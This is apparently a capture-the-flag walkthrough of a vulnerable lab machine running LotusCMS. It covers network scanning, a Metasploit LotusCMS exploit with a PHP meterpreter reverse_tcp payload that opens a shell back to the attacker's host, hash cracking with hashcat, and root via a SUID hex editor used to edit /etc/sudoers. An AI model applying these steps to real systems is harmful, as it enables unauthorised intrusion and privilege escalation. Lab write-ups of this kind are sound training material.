Bob1Bob2

Tools:

• netdiscover
• Nmap
• Nikto
• Metasploit
• Wfuzz
• Hashcat

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.184 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.184 -p-

Ports 22 and 80 are opening.

Now use Nikto to scan:

nikto -h 192.168.79.184

Nothing excited.

Now lets browser the web page in the target.

Find the target may use LotusCMS.

In msfconsole:

search LotusCMS

find one exploit

1
2
3
4
5
6

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(lcms_php_exec) > set rhost 192.168.79.184
msf exploit(lcms_php_exec) > set uri 
msf exploit(lcms_php_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(lcms_php_exec) > set lhost 192.168.79.173
exploit

Got the shell, next step is try to get root.

In this step, I tried to enumeration all kinds of shit and use serveral vernerable kernel exploits to get the root but failed. During the emumeration. I found a ffile gconfig.php is interesting. Then I found that:

maybe the username/password for ssh, but no. Thats too easy.

So that I go back to use wfuzz the scan the http services.

Looks like it has phpmyadmin. Try that:

Log in using the username/password that just found. Successed.

review the content, found this:

now found two users and the hashed passwords:

Copy the passwords to a file use hashcat to crack it:

hashcat hash.txt /user/share/wordlists/rockyou.txt

get both passwords:

ssh to the target, search the SUID binaries:

find / -perm +6000 -type f -exec ls -ld {} \;

found an interesting file /uss/local/bin/ht, I googled it and found it is a hex editor.

now try to use it to open /etc/sudoers file, get error message. to fix it:

export TERM=xterm

change the loneferret permission:

get the root

DONE